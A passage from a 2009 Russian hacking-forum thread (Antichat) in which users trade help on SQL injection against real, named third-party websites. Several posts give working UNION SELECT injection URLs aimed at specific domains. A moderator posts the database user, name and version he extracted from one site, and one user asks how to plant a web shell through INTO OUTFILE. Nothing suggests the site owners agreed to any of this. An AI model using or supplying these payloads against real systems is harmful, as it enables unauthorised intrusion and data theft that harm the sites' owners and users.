ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #101  
Старый 29.06.2009, 10:39
Аватар для SeTM
SeTM
Новичок
Регистрация: 11.06.2008
Сообщений: 29
Провел на форуме:
340480

Репутация: 11
По умолчанию

Здравствуйте, есть сайт с Injection в POST запросе.
При value="1' " выдает
Цитата:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by `name`' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in shop.php on line 456
видимо кавычки экранируются.
При запросе value="1+1" выдает страницу как при value="2".
Возможно ли расскрутить эту иньекцию в что либо стоящие?

Последний раз редактировалось SeTM; 02.07.2009 в 09:03..
 
Ответить с цитированием

  #102  
Старый 01.07.2009, 10:49
Аватар для AlexSatter
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

SeTM, почему нет?
пробуй дальше, всё так же как и при GET, только с POST Запросами...
 
Ответить с цитированием

  #103  
Старый 09.10.2009, 21:37
Аватар для N@b$ter
N@b$ter
Новичок
Регистрация: 06.10.2009
Сообщений: 3
Провел на форуме:
76901

Репутация: 0
Отправить сообщение для N@b$ter с помощью ICQ
Question

Хай алл. Кароче фак суперский, но есть пара дополнений например, место того чтобы до куя раз писать limit+1,1 limit+2,1 не легче ли просто написать limit+1,200 и все таблицы выдут пробывал =). Ещё такой вопрос я нашёл дрявый сайт http://www.feldgrau.com/articles.php?ID=73+union+select+1,2,3,4,5,6,@@base dir,8/* ну раскрутил до нельзя, но не могу загнать шелл потому что там нет админки и через Into outfile тоже не получается кто знает помогите до конца освоить =)
 
Ответить с цитированием

  #104  
Старый 18.10.2009, 16:58
Аватар для L I G A
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

тривиальный пример:
Код:
mysql_query('select *  from  `news` where id =$_GET['id']')
 
Ответить с цитированием

  #105  
Старый 25.10.2009, 19:35
Аватар для GR00nDeL
GR00nDeL
Новичок
Регистрация: 30.09.2009
Сообщений: 2
Провел на форуме:
55307

Репутация: 0
По умолчанию

Ну к примеру сайт http://www.mibf.ru.Захожу в любую новость
http://www.mibf.ru/?id=52&news_id=417
Вместо 417 вставляю 1'
Выходят ошибки SQL(как я понял)
Теперь не пойму...можно ли использовать SQL Injection тут,и что мне дальше делать с этим?

П.С заметил когда в ссылке http://www.mibf.ru/?id=52&news_id=417 вместо ?id=52 вставляю 1' вылезает белое окно с ошибкой,А если на место 417 вставить...будет другой результят.С чем это может быть связанно?

Заранее благодарю
 
Ответить с цитированием

  #106  
Старый 25.10.2009, 20:40
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от GR00nDeL  
Ну мне поможет кто нибудь с моим вопросом?(
eval()'d code

Это не SQL ошибка, а вообще мне кажется он исполняет точто приходит из бд.
Сейчас покавыряюсь скажу.

http://www.mibf.ru/?id=-52+union+select+1,2,3,4,5,6,7,8,9,10+--+
>>

http://www.mibf.ru/?id=-52+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,user( ),database(),version()),concat_ws(0x3a,user(),data base(),version()),10+--+
>>>
User: mibf@localhost
Database: mibficom
Version: 5.0.45

Последний раз редактировалось Ctacok; 25.10.2009 в 20:46..
 
Ответить с цитированием

  #107  
Старый 03.11.2009, 02:16
Аватар для freelsd
freelsd
Участник форума
Регистрация: 25.10.2007
Сообщений: 177
Провел на форуме:
551782

Репутация: 58
Отправить сообщение для freelsd с помощью ICQ
По умолчанию

Приветствую. К сожалению, в силу своей безграмотности я так и не смог провести ни одной иньекции. Синтаксис sql немного знаю, но по статьям не получается никак.
Как правило, грабли одни и те же. Вот к примеру
Уязвимый скрипт register.cgi
Количество столбцов: 2.
Вот запрос(## убрать):
Цитата:
http://www.s##par##k-com.ru/cgi-bin/register.cgi?region_id=-1+union+select+1,2--
Однако, при подстановке в одно из полей, к примеру, @@basedir или Version вывод остается неизменным. Что я делаю не так?
 
Ответить с цитированием

  #108  
Старый 03.11.2009, 11:58
Аватар для Roston
Roston
Постоянный
Регистрация: 31.07.2008
Сообщений: 370
Провел на форуме:
2866942

Репутация: 350
Отправить сообщение для Roston с помощью ICQ
По умолчанию

хм... скорее всего нет полей на вывод
 
Ответить с цитированием

  #109  
Старый 03.11.2009, 18:35
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
Сообщение от freelsd  
Приветствую. К сожалению, в силу своей безграмотности я так и не смог провести ни одной иньекции. Синтаксис sql немного знаю, но по статьям не получается никак.
Как правило, грабли одни и те же. Вот к примеру
Уязвимый скрипт register.cgi
Количество столбцов: 2.
Вот запрос(## убрать):

Однако, при подстановке в одно из полей, к примеру, @@basedir или Version вывод остается неизменным. Что я делаю не так?
_http://www.spark-com.ru/cgi-bin/register.cgi?region_id=-1+union+select+concat_ws(0x3a,version(),user(),dat abase()),null--

Последний раз редактировалось .:[melkiy]:.; 03.11.2009 в 18:45..
 
Ответить с цитированием

  #110  
Старый 23.11.2009, 12:17
Аватар для Dr.Gonzo
Dr.Gonzo
Познающий
Регистрация: 26.02.2009
Сообщений: 34
Провел на форуме:
276020

Репутация: 18
По умолчанию

подскажите пожалуйста, что делать, если на запрос
.../?id=-1+union+select+COLUMN_NAME+FROM+INFORMATION_SCHEMA .COLUMNS+WHERE+TABLE_NAME='author'+LIMIT+1,1+--
выводится mysql_fetch_array(): supplied argument is not a valid MySQL result resource...

похоже, что фильтруется кавычка, но
.../?id=-1+union+select+COLUMN_NAME+FROM+INFORMATION_SCHEMA .COLUMNS+WHERE+TABLE_NAME=char(27)+author+char(27) +LIMIT+1,1+--
выводит ту же ошибку
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Injection: Modes of Attack, Defence, and Why It Matters bxN5 Forum for discussion of ANTICHAT 1 09.04.2007 19:07
SQL Injection FAQ bx_N Forum for discussion of ANTICHAT 2 08.03.2007 18:48
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ